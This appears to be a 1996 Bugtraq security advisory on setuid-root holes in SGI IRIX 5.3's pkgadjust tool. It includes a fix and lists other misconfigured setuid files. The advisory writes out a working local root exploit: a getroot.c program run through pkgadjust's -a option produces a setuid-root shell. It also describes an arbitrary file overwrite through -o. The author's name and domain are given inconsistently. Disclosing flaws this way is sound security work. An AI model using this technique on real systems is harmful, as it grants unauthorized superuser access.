Security hole in SGI package installation system
daemon@ATHENA.MIT.EDU (Hui-Hui Hu)
Sat Jan 27 17:08:22 1996
Date: Sat, 27 Jan 1996 10:57:02 -0500
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Hui-Hui Hu <hhui@stardot.net>
X-To: BUGTRAQ@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
There are several major security holes in SGI's package installation system
for IRIX 5.3. The code appears to have been written without proper
consideration of the implications of running setuid root. Any local user can
gain superuser access, and can also overwrite (and thereby destroy) arbitrary files.
The main program that pkg{info,rm,etc} call is /usr/pkg/bin/pkgadjust,
which is setuid root.
PROGRAM. pkgadjust (from eoe2.sw.oampkg)
AFFECTS. SGI IRIX 5.3. IRIX 5.2 is not affected; unsure about IRIX 6.
REQUIRED. Account on server
RISK. superuser
AUTHOR. Tung-Hui Hu <hhui@stardot.net>
---
PROBLEM 1. pkgadjust will allow any user to overwrite any file, because it
lets the caller choose, via a command-line option:
-o write debugging output to <file> rather than to stderr
Since pkgadjust runs as root and does not check the ownership or permissions of
<file> before opening it, the target's previous contents are destroyed. This
yields a denial of service, or the removal of authorization checks if the
overwritten file is one that enforces them.
---
PROBLEM 2. pkgadjust will allow any user to gain superuser access.
The programs used to list installed packages can be chosen via command-line options:
-a <cmd> normally 'versions long' command line
-b <cmd> normally 'versions -v' command line
This is trivially exploited:
% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database
updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh
% panic
---
FIX.
# chmod 700 /usr/pkg/bin/pkgadjust
DISCUSSION. No sermons here, but I really doubt the program was
written for setuid. Since most users can't write to the lockfile
in /var/sadm, many pkg* commands are unavailable. I also found
these files improperly permissioned and would recommend removing setuid:
-rwsr-xr-x 1 root sys 838 Sep 27 11:27 /usr/lib/X11/app-defaults/ISDN
-rws--x--x 1 root sys 18632 Sep 27 10:59 /usr/pkg/bin/abspath
Tung-Hui Hu / '97 Comparative Literature / Princeton Universe
hhui@stardot.com / the STATIC: http://www.stardot.com/~hhui/static